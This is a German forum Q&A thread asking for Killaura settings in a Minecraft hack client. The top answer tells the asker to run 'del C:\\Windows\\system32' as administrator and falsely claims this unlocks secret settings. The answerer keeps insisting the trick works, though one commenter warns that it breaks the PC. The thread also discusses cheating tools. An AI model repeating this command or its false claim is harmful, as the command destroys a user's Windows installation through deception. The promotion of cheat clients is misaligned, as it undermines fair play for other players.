Alpha Centauri(Hack client) besten Killaura settings?

...komplette Frage anzeigen

3 Antworten

Du musst cmd als Admin öffnen und dann eingeben: del C:\\\\Windows\\\\system32
Dies schaltet die secret settings frei. Du kannst da Range auf 200 stellen und es bypasst alle anticheats. Wichtig: Davor musst du deinen PC noch neustarten

Antwort bewerten Vielen Dank für Deine Bewertung
Kommentar von tobixxdd
29.09.2016, 14:13

DANKE hat funktioniert, Gewinne jz alle runden easy

1
Kommentar von hallolozwei
06.10.2016, 07:00

Macht es nicht -_-

0
Kommentar von XVirusX
06.10.2016, 07:10

Wieso nicht? Hast du es ausprobiert? Ich will auf gutefrage.net so vielen Menschen wie möglich helfen, es funktioniert, glaub mir.

0
Kommentar von IchBinBatman45
31.05.2017, 22:44

Der Name "Virus passt zu dir" , wieso willst du schaden anrichten? Oder irre ich mich wenn man System 32 löscht/freischaltet der pc crasht,

0

Bitte lass es einfach. Das nimmt anderen den Spaß am spielen

Antwort bewerten Vielen Dank für Deine Bewertung

Schau mal beim YouTube Kanal von haze vorbei... Er hat ein Video zu diesem Client gemacht, den er auch in seinem Shop verkauft.

Antwort bewerten Vielen Dank für Deine Bewertung

Was möchtest Du wissen?